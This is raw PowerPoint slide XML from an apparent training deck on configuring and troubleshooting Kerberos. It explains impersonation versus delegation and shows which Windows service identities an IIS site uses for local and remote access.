          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuring and Troubleshooting Kerberos</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162810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What is the difference?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1923604"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impersonation – The service gains access to its local resources using the identity of the authenticated user.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegation – The service gains access to another remote service using the identity of the authenticated user. This always includes impersonation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impersonation vs Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205988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a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication and Authorization (Trusted Subsystem)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Kerberos Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38" descr="server.emf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4086682" y="1317558"/>
            <a:ext cx="717771" cy="1071570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Picture 10" descr="Desktop PC"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="881648" y="1593634"/>
            <a:ext cx="714380" cy="859865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 11" descr="usr"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="819734" y="1954923"/>
            <a:ext cx="379515" cy="575652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 22" descr="Blue Embossed Cylinder"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4409304" y="1970208"/>
            <a:ext cx="549382" cy="721821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 42" descr="D:\Aeshen\TechNet 2006\12-December\Msft-longhorn-papers\TDM Deck\Windows Illustration Icons\Internet.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3894489" y="2100706"/>
            <a:ext cx="571505" cy="571504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43" descr="server.emf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503260" y="1314888"/>
            <a:ext cx="717771" cy="1071570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 22" descr="Blue Embossed Cylinder"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7816206" y="1967538"/>
            <a:ext cx="549382" cy="721821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rounded Rectangle 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5891428" y="2935284"/>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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe"/>
              </a:rPr>
              <a:t>Remote access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Segoe"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rounded Rectangle 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3270344" y="2935284"/>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GB" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe"/>
              </a:rPr>
              <a:t>Local access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Segoe"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Rounded Rectangle 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="649260" y="2935284"/>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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Segoe"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe"/>
              </a:rPr>
              <a:t>Identity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rounded Rectangle 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5885078" y="3295546"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COMPUTER$</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rounded Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3263994" y="3295546"/>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400">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Rounded Rectangle 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="650284" y="3302920"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Rounded Rectangle 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5892452" y="3670770"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANONYMOUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Rounded Rectangle 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3271368" y="3670770"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rounded Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="650284" y="3670770"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rounded Rectangle 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5886102" y="4038406"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COMPUTER$</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rounded Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3265018" y="4038406"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYSTEM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rounded Rectangle 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="651308" y="4038406"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rounded Rectangle 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5886102" y="4409066"/>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GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COMPUTER$</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Rounded Rectangle 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3265018" y="4409066"/>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US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IIS APPPOOL\&lt;Name&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Rounded Rectangle 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="643934" y="4409066"/>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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ApplicationPoolIdentity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Rectangle 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571472" y="2500306"/>
            <a:ext cx="1061509" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Group 61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3673924" y="2420704"/>
            <a:ext cx="469448" cy="285752"/>
            <a:chOff x="3673924" y="2420704"/>
            <a:chExt cx="469448" cy="285752"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Flowchart: Preparation 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3673924" y="2420704"/>
              <a:ext cx="428628" cy="285752"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartPreparatio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de-DE" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="TextBox 63"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3690252" y="2453360"/>
              <a:ext cx="453120" cy="246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                <a:t>WP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Right Arrow 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1596028" y="1795502"/>
            <a:ext cx="2490806" cy="248514"/>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6" name="Right Arrow 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4788616" y="1708948"/>
            <a:ext cx="2736766" cy="288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7" name="U-Turn Arrow 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4907675" y="1858494"/>
            <a:ext cx="546712" cy="794972"/>
          </a:xfrm>
          <a:prstGeom prst="uturnArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 43750"/>
              <a:gd name="adj5" fmla="val 928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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835696" y="1980129"/>
            <a:ext cx="1702164" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Integrated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(No Impersonation)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Content Placeholder 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="5293657"/>
            <a:ext cx="8675720" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId8"/>
              </a:buBlip>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="548640" lvl="1" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId8"/>
              </a:buBlip>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="822960" lvl="2" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1097280" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1371600" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"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a:t>The web site does not impersonate the user‘s identity so the account the web site is running under is used to local access. Remote access uses the computer account or anonymous.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rounded Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5885478" y="4786610"/>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GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WEB1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rounded Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3264394" y="4786610"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WEB1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rounded Rectangle 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="643310" y="4786610"/>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solidFill>
                  <a:schemeClr val="tx1"/>
